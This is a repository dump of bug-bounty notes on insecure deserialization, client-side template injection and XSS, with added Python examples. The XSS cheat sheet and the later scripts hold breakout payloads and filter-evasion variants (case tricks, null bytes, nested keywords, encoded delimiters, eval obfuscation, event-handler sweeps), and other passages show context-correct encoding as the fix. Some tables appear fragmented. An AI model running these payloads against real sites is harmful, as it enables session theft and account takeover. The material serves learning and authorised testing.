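    """Decode one serialized value; the whole input must be consumed."""
    if isinstance(data, str):
        data = data.encode("utf-8")
    value, pos = _parse(data, 0)
    if _skip_ws(data, pos) != len(data):
        raise PhpSerializeError(f"trailing data at offset {pos}")
    return value


def is_malformed(data) -> bool:
    """True if the input is rejected, e.g. a string whose declared length does not match its content."""
    try:
        php_unserialize(data)
    except PhpSerializeError:
        return True
    return False


if __name__ == "__main__":
    print(php_unserialize('O:4:"User":2:{s:4:"name":s:6:"carlos"; s:10:"isLoggedIn":b:1;}'))
```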

# Insecure Deserialization
--------------------------------------------------------------------------------
/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/Template injections 5633da87439b4f3b91e56feeb5a3332f.md:
--------------------------------------------------------------------------------
# Template injections

[SSTI](Template%20injections%205633da87439b4f3b91e56feeb5a3332f/SSTI%205934bbc2430f4887bf5a460087454341.md)

[CSTI](Template%20injections%205633da87439b4f3b91e56feeb5a3332f/CSTI%20c1ef3fe5df3a4f60a253596e37a2883a.md)
--------------------------------------------------------------------------------
/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/Template injections 5633da87439b4f3b91e56feeb5a3332f/CSTI c1ef3fe5df3a4f60a253596e37a2883a.md:
--------------------------------------------------------------------------------
# CSTI

# What is it?

CSTI: Client-side template injection

This type of vulnerability occurs when developers use a client-side templating engine such as Vue or Angular. These templating engines let the server push code to the client that contains placeholders (e.g. {{NAME}}). The placeholders are then replaced in the client's browser with their respective values.

These vulnerabilities are not yet well researched, and it will be up to the hunter to properly research the vulnerability when it is encountered. First of all, try to find out which templating engine is being used, then look up how that engine works and try to work out how to exploit the issue.

# Attack strategy

Our attack strategy taught us to insert an SSTI attack vector into every possible input field. In theory this should allow us to identify CSTI vulnerabilities as well.

Once we have identified a resolved attack vector, it is important that we know how the templating engine works, because we need to craft a good attack vector with proper impact. Our basic attack vector was {{7*7}}; it resolves to 49, which means a calculation got executed. This gives us a pretty good indication that a CSTI vulnerability exists, but of course using a website as a calculator is not really a vulnerability. We will have to increase our impact before we report it.

The impact itself will also depend heavily on what we are able to pull off. CSTI vulnerabilities lead to XSS attacks, which we can exploit like any other XSS attack; however, if the templating engine is only used to display non-sensitive public data, there is not much of value we can steal with our attack, and it will be marked as a low-impact issue. If, however, another application on the same domain can access the session cookies, we might be able to steal those and raise our severity.
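Why {{7*7}} coming back as 49 is the tell: the engine only evaluates what is in the template source, so the bug is always that user data was concatenated into the source instead of being passed through the data context. The following is an added Python example, not code from this repository and not a real client-side engine; it is a toy {{ }} renderer with an integer-only evaluator, used as a stand-in for Vue or Angular to show the vulnerable and the safe way of getting user input onto the page.

```python
import ast
import operator
import re
from typing import Any, Dict

PLACEHOLDER = re.compile(r"\{\{(.*?)\}\}")
OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}


def evaluate(expr: str, ctx: Dict[str, Any]) -> Any:
    """Evaluate a placeholder expression: integer arithmetic and context variables only."""
    def walk(node: ast.AST) -> Any:
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and type(node.value) is int:
            return node.value
        if isinstance(node, ast.Name):
            return ctx[node.id]                       # data supplied by the application
        if isinstance(node, ast.BinOp) and type(node.op) in OPS:
            return OPS[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError(f"disallowed expression: {expr!r}")
    return walk(ast.parse(expr.strip(), mode="eval"))


def render(template: str, ctx: Dict[str, Any]) -> str:
    """Replace every {{ expr }} in the template source in a single pass; substituted text is not re-scanned."""
    return PLACEHOLDER.sub(lambda m: str(evaluate(m.group(1), ctx)), template)


def greet_vulnerable(user_input: str) -> str:
    """Vulnerable: user data is concatenated into the template *source*, so the engine evaluates it."""
    return render("Hello " + user_input, {})


def greet_safe(user_input: str) -> str:
    """Safe: the template is static and the data arrives through the context, where it is never evaluated."""
    return render("Hello {{ name }}", {"name": user_input})


def probe_resolved(probe: str, output: str) -> bool:
    """The notes' check: did the probe come back evaluated (49) instead of as literal text?"""
    return "49" in output and probe not in output


if __name__ == "__main__":
    probe = "{{7*7}}"                                 # the basic attack vector from the notes
    for name, fn in [("vulnerable", greet_vulnerable), ("safe", greet_safe)]:
        out = fn(probe)
        print(f"{name:10} -> {out!r}  resolved={probe_resolved(probe, out)}")
```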
--------------------------------------------------------------------------------
/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/XSS 0ad0878f33094ea6b8ac90e94c2b0dc2.md:
--------------------------------------------------------------------------------
# XSS

[XSS Cheat sheet](XSS%200ad0878f33094ea6b8ac90e94c2b0dc2/XSS%20Cheat%20sheet%205c643ce56d1e4ed9871fdd909ded017e.md)

[General XSS Beginner Guide](XSS%200ad0878f33094ea6b8ac90e94c2b0dc2/General%20XSS%20Beginner%20Guide%20eaccd159eee04f7aaefda9b78bce0c8c.md)

[DOM XSS ](XSS%200ad0878f33094ea6b8ac90e94c2b0dc2/DOM%20XSS%205e31c327eca54f2c84e07fd5e46df88a.md)
--------------------------------------------------------------------------------
/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/XSS 0ad0878f33094ea6b8ac90e94c2b0dc2/XSS Cheat sheet 5c643ce56d1e4ed9871fdd909ded017e.md:
--------------------------------------------------------------------------------
# XSS Cheat sheet

# Active XSS hunting

## Attack strategy

[Types of XSS](XSS%20Cheat%20sheet%205c643ce56d1e4ed9871fdd909ded017e/Types%20of%20XSS%20f9e208deac544d628aeb1522700c8975.csv)

# Passive XSS hunting

## Attack strategy

Enter "'`>Rat was here into every field that you see.

- Name, last name, address, ... at registration
- Names and content of every object you create
- EVERYWHERE

If you encounter a value that's reflected, determine the context.

[Contexts](XSS%20Cheat%20sheet%205c643ce56d1e4ed9871fdd909ded017e/Contexts%208aae6c796a57413099e7e4fdd0ef5709.csv)

# Filter evasion

[Techniques](XSS%20Cheat%20sheet%205c643ce56d1e4ed9871fdd909ded017e/Techniques%20c0f9870e01324ea5b82e30269cc90503.csv)
--------------------------------------------------------------------------------
/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/XSS 0ad0878f33094ea6b8ac90e94c2b0dc2/XSS Cheat sheet 5c643ce56d1e4ed9871fdd909ded017e/Contexts 8aae6c796a57413099e7e4fdd0ef5709.csv:
--------------------------------------------------------------------------------
Column,JavaScript context,HTML Tag context,HTML Tag attribute context
Attack vector,"'""`",Rat was here + ,"""'`>"
Breaks,Breaks javascript functions,"Nothing, reflects value into HTML context without sanitise, allowing for own tags","HTML tag attribute such as ""Value"" for tag"
Exploit,Try to insert our own JS code,Add event handlers to tags,Insert JS event handler or JS code into tag
"Example ",'); alert(); —,,' alert(); '
--------------------------------------------------------------------------------
/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/XSS 0ad0878f33094ea6b8ac90e94c2b0dc2/XSS Cheat sheet 5c643ce56d1e4ed9871fdd909ded017e/Contexts 8aae6c796a57413099e7e4fdd0ef5709/' ` e36ffb9f04e8440f8f5b47b7e69f5478.md:
--------------------------------------------------------------------------------
# '"`

Column: Attack vector
HTML Tag attribute context: "'`>
HTML Tag context: Rat was here +
--------------------------------------------------------------------------------
/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/XSS 0ad0878f33094ea6b8ac90e94c2b0dc2/XSS Cheat sheet 5c643ce56d1e4ed9871fdd909ded017e/Contexts 8aae6c796a57413099e7e4fdd0ef5709/'); alert(); — 912c145846154ad2a89c539bd65f48ff.md:
--------------------------------------------------------------------------------
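The probe string is chosen so that each of its characters breaks out of one of the three contexts in the Contexts table: `>` closes an HTML tag, `"` and `'` close an attribute or a JavaScript string, and the backtick closes a template literal. The fix is the mirror image, one encoder per context. The following is an added Python example, not code from this repository; it renders the probe into each context with the correct encoding next to the raw reflection the cheat sheet is hunting for.

```python
import html
import json

# The probe from the cheat sheet: "'`>Rat was here
PROBE = "\"'`>Rat was here"


def unsafe_body(value: str) -> str:
    """Raw reflection into the HTML tag context: the value can open its own tags."""
    return "<p>" + value + "</p>"


def html_body(value: str) -> str:
    """HTML tag context: entity-encode &, <, >, \" and ' so no tag or attribute can start."""
    return "<p>" + html.escape(value, quote=True) + "</p>"


def html_attribute(value: str) -> str:
    """HTML tag attribute context: always quote the attribute and encode the quote characters."""
    return '<input type="text" name="input" value="' + html.escape(value, quote=True) + '">'


def js_string(value: str) -> str:
    """JavaScript string context: JSON-encode the value, and also escape < and > so a
    reflected </script> cannot end the script block from inside the string."""
    encoded = json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")
    return "<script>var name = " + encoded + ";</script>"


def is_reflected_raw(rendered: str, probe: str) -> bool:
    """The cheat sheet's check: does the probe survive unchanged somewhere in the response?"""
    return probe in rendered


if __name__ == "__main__":
    for name, fn in [("unsafe body", unsafe_body), ("body", html_body),
                     ("attribute", html_attribute), ("js string", js_string)]:
        out = fn(PROBE)
        print(f"{name:12} raw={is_reflected_raw(out, PROBE)!s:5} {out}")
```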
| # '); alert(); — 2 | 3 | Column: Example 4 | HTML Tag attribute context: ' alert(); ' 5 | HTML Tag context: -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/XSS 0ad0878f33094ea6b8ac90e94c2b0dc2/XSS Cheat sheet 5c643ce56d1e4ed9871fdd909ded017e/Contexts 8aae6c796a57413099e7e4fdd0ef5709/Breaks javascript functions c6e6ca69b5314fce978c5b2180a6485d.md: -------------------------------------------------------------------------------- 1 | # Breaks javascript functions 2 | 3 | Column: Breaks 4 | HTML Tag attribute context: HTML tag attribute such as "Value" for tag 5 | HTML Tag context: Nothing, reflects value into HTML context without sanitise, allowing for own tags -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/XSS 0ad0878f33094ea6b8ac90e94c2b0dc2/XSS Cheat sheet 5c643ce56d1e4ed9871fdd909ded017e/Contexts 8aae6c796a57413099e7e4fdd0ef5709/Try to insert our own JS code 8a13b68fc9014164b4b0f4d929bc58fa.md: -------------------------------------------------------------------------------- 1 | # Try to insert our own JS code 2 | 3 | Column: Exploit 4 | HTML Tag attribute context: Insert JS event handler or JS code into tag 5 | HTML Tag context: Add event handlers to tags -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/XSS 0ad0878f33094ea6b8ac90e94c2b0dc2/XSS Cheat sheet 5c643ce56d1e4ed9871fdd909ded017e/Techniques c0f9870e01324ea5b82e30269cc90503.csv: -------------------------------------------------------------------------------- 1 | Name,Tags,Column 2 | Basic modifications," 3 | 4 | 5 | Encoded tabs/newlines/CR 6 | alert(1) 7 | alert(1) 8 | alert(1) 9 | Capital letters 10 | Adding nullbytes: 11 | <%00script>alert(1) 12 | ","Doing basic things like adding spaces, encoding tabs, newlines and carriege 
rerurns can do a lot alread" 13 | Attributes and tags," 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | <%00input type=""text"" name=""input"" value=""> 23 | 24 | 25 | ",We can do the same basic modifications to attribute tags and add things like nullbytes 26 | Event handlers,"Use burp intruder, select your event handler that's blocked and use burp suites cheat sheet to test all event handlers","Try all different event handlers 27 | https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 28 | Use burp intruder" 29 | Delimiters and brackers," 30 | 31 | URL encodign 32 | 33 | 34 | Backticks 35 | 36 | Encoded backtics 37 | ",Sometimes we can play with things like delimiters by encoding them if they are blocked 38 | "Delimiters and brackers - 2 ","Double use of delimiters 39 | < 40 | Unknown delimiters 41 | «input onsubmit=alert(1)» 42 | Encoded 43 | ®input onsubmit=alert(1)¯", 44 | Eval()," 45 | 46 | ",We can also make use of the eval() function in JS to obfuscate some strings so they won't be filtered 47 | Using filtered words in filtered words,"If script is filtered 48 | might become 6 | 5 | 6 | URL encodign 7 | 8 | 9 | Backticks 10 | 11 | Encoded backtics 12 | -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/XSS 0ad0878f33094ea6b8ac90e94c2b0dc2/XSS Cheat sheet 5c643ce56d1e4ed9871fdd909ded017e/Techniques c0f9870e01324ea5b82e30269cc90503/Eval() 6ea0bd9725f841a59ecc7da81ef27096.md: -------------------------------------------------------------------------------- 1 | # Eval() 2 | 3 | Column: We can also make use of the eval() function in JS to obfuscate some strings so they won't be filtered 4 | Tags: 5 | 6 | -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/XSS 0ad0878f33094ea6b8ac90e94c2b0dc2/XSS Cheat sheet 5c643ce56d1e4ed9871fdd909ded017e/Techniques 
c0f9870e01324ea5b82e30269cc90503/Event handlers 52045e13e76a4091a4cb5891e914cd2b.md: -------------------------------------------------------------------------------- 1 | # Event handlers 2 | 3 | Column: Try all different event handlers 4 | https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 5 | Use burp intruder 6 | Tags: Use burp intruder, select your event handler that's blocked and use burp suites cheat sheet to test all event handlers 7 | 8 | ![Event%20handlers%2052045e13e76a4091a4cb5891e914cd2b/Untitled.png](Event%20handlers%2052045e13e76a4091a4cb5891e914cd2b/Untitled.png) -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/XSS 0ad0878f33094ea6b8ac90e94c2b0dc2/XSS Cheat sheet 5c643ce56d1e4ed9871fdd909ded017e/Techniques c0f9870e01324ea5b82e30269cc90503/Event handlers 52045e13e76a4091a4cb5891e914cd2b/Untitled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Vulnerability types d6487b7204244f159482be2dfb025fea/XSS 0ad0878f33094ea6b8ac90e94c2b0dc2/XSS Cheat sheet 5c643ce56d1e4ed9871fdd909ded017e/Techniques c0f9870e01324ea5b82e30269cc90503/Event handlers 52045e13e76a4091a4cb5891e914cd2b/Untitled.png -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/XSS 0ad0878f33094ea6b8ac90e94c2b0dc2/XSS Cheat sheet 5c643ce56d1e4ed9871fdd909ded017e/Techniques c0f9870e01324ea5b82e30269cc90503/Use your imagination 3 6af362057ffa48158bc30b14979e51ad.md: -------------------------------------------------------------------------------- 1 | # Use your imagination <3 -------------------------------------------------------------------------------- /notes/Vulnerability types d6487b7204244f159482be2dfb025fea/XSS 0ad0878f33094ea6b8ac90e94c2b0dc2/XSS Cheat 
sheet 5c643ce56d1e4ed9871fdd909ded017e/Techniques c0f9870e01324ea5b82e30269cc90503/Using filtered words in filtered words 8aa56d798b6b422e986f2b2f630adab5.md: -------------------------------------------------------------------------------- 1 | # Using filtered words in filtered words 2 | 3 | Column: This helped me find many bounties 😂 4 | Tags: If script is filtered 5 | might become
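The three injection contexts from the Contexts table, as an added worked example that is not part of the original cheat sheet: a deliberately naive template reflects one value into a tag attribute, into the HTML body and into a JavaScript string, beside the same template with output encoding chosen per context. The probe strings, the `search()` function name and the `js_string` helper are my own constructions (the JavaScript-context probe closes the string and the call, then comments out the rest with `//`).

```python
"""Per-context XSS breakout and per-context output encoding (added example)."""
import html
import json

# Constructed probes, one per context in the cheat sheet's table (my payloads,
# not the page's).  Each is the smallest string that closes its context.
PROBES = {
    "attr": '" autofocus onfocus="alert(1)',   # closes value="..." and adds a handler
    "html": "<img src=x onerror=alert(1)>",      # plain tag injection into a text node
    "js":   "'); alert(1); //",                  # closes the JS string and the call
}


def render_unsafe(value: str) -> dict:
    """Naive template: reflects the value verbatim into all three contexts."""
    return {
        "attr": f'<input type="text" name="q" value="{value}">',
        "html": f"<p>You searched for {value}</p>",
        "js":   f"<script>search('{value}');</script>",
    }


def js_string(value: str) -> str:
    """Emit a JS string literal that can neither end the literal nor the <script> block.

    json.dumps supplies the quotes and escapes control characters; the extra
    replacements cover '<' (so "</script>" cannot appear), '&', the single quote
    and the two Unicode line terminators that JS treats as newlines.
    """
    out = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026"),
                    ("'", "\\u0027"), ("\u2028", "\\u2028"), ("\u2029", "\\u2029")):
        out = out.replace(ch, esc)
    return out


def render_safe(value: str) -> dict:
    """Same template, with the encoder matched to the context each value lands in."""
    return {
        # quote=True also encodes " and ', which is what keeps the attribute closed
        "attr": f'<input type="text" name="q" value="{html.escape(value, quote=True)}">',
        # in a text node only & < > matter
        "html": f"<p>You searched for {html.escape(value, quote=False)}</p>",
        # the JS encoder produces the quotes itself, so the template has none
        "js":   f"<script>search({js_string(value)});</script>",
    }


def reflected_unencoded(renderer) -> dict:
    """For each context: does its probe come back byte-for-byte (breakout possible)?"""
    return {ctx: probe in renderer(probe)[ctx] for ctx, probe in PROBES.items()}


if __name__ == "__main__":
    for name, renderer in (("unsafe", render_unsafe), ("safe", render_safe)):
        print(name, reflected_unencoded(renderer))
        for ctx, probe in PROBES.items():
            print("   ", renderer(probe)[ctx])
```

`reflected_unencoded` is a triage oracle, not proof of execution: it tells you which context the input lands in and whether the breakout characters from the table survive, which is the decision point before you reach for the filter-evasion techniques. Nested contexts (a URL inside an attribute, HTML that a script later writes with `innerHTML`) need the encoder for each layer applied in turn.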
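The Techniques table as an added, runnable example (my own code, not from the cheat sheet or its author): a constructed blacklist filter with the weaknesses the rows exploit (single-pass deletion, case-sensitive matching, filtering before URL-decoding), and a candidate generator that applies the basic modifications, the filtered-word-inside-filtered-word trick, encoded delimiters, an `eval(String.fromCharCode(...))` wrapper and an event-handler sweep, then reports which variants come through. The blocked-pattern list, the sample handler names and the payloads are assumptions made for the demo.

```python
"""Filter-evasion candidates from the Techniques table run against a toy blacklist (added example)."""
from urllib.parse import unquote

# Constructed blacklist with the defects the cheat-sheet rows exploit:
# each pattern is deleted once (single pass), matching is case-sensitive,
# and the filter runs on the raw query-string value before URL-decoding.
BLOCKED = ("<script>", "</script>", "onerror", "onload", "onmouseover")

# A few handler names of the kind a Burp Intruder sweep over the PortSwigger
# cheat sheet would try (sample only, not the full list).
EVENT_HANDLERS = ("onerror", "onload", "onmouseover", "onfocus", "ontoggle", "onanimationstart")


def naive_filter(value: str) -> str:
    for pattern in BLOCKED:
        value = value.replace(pattern, "", 1)        # removes only the first hit
    return value.replace('"', "").replace("'", "")   # strips attribute delimiters


def app_render(value: str) -> str:
    """Models the vulnerable app: filter the raw parameter, then URL-decode it into the page."""
    return unquote(naive_filter(value))


def from_char_code(js: str) -> str:
    """Eval() row: hide a filtered string by rebuilding it from char codes at runtime."""
    codes = ",".join(str(ord(c)) for c in js)
    return f"eval(String.fromCharCode({codes}))"


def candidates():
    """Yield (technique, payload, text that must survive for the variant to count)."""
    script = "<script>alert(1)</script>"
    attr = '" autofocus onfocus="alert(1)'           # attribute-context breakout
    yield "baseline script tag", script, "<script>"
    yield "capital letters", script.replace("script", "ScRiPt"), "<ScRiPt>"
    yield "filtered word inside filtered word", script.replace("<script>", "<scr<script>ipt>", 1), "<script>"
    yield "null byte in tag name", script.replace("<script>", "<%00script>", 1), "<\x00script>"
    yield "baseline attribute breakout", attr, attr
    yield "URL-encoded delimiters", attr.replace('"', "%22"), attr
    yield "eval + String.fromCharCode", f"<img src=x onfocus={from_char_code('alert(1)')}>", "String.fromCharCode("
    for handler in EVENT_HANDLERS:
        yield f"event handler sweep: {handler}", f"<img src=x {handler}=alert(1)>", f"{handler}="


def find_bypasses(render=app_render) -> list:
    """Techniques whose marker survives the filter (a filter check, not a browser check)."""
    return [name for name, payload, marker in candidates() if marker in render(payload)]


if __name__ == "__main__":
    for name, payload, _ in candidates():
        print(f"{name:40s} -> {app_render(payload)!r}")
    print("bypasses:", find_bypasses())
```

Surviving the filter is only half the test: the null-byte variant passes this filter, but current HTML5 tokenizers do not treat `<\x00script>` as a tag, so every survivor still has to be confirmed in the browser, which is exactly why the Event handlers row points at Intruder plus the browser rather than at a regex. Swap `naive_filter` for the target's observed behaviour (or drive `app_render` through a request) to reuse the same candidate list against a real endpoint.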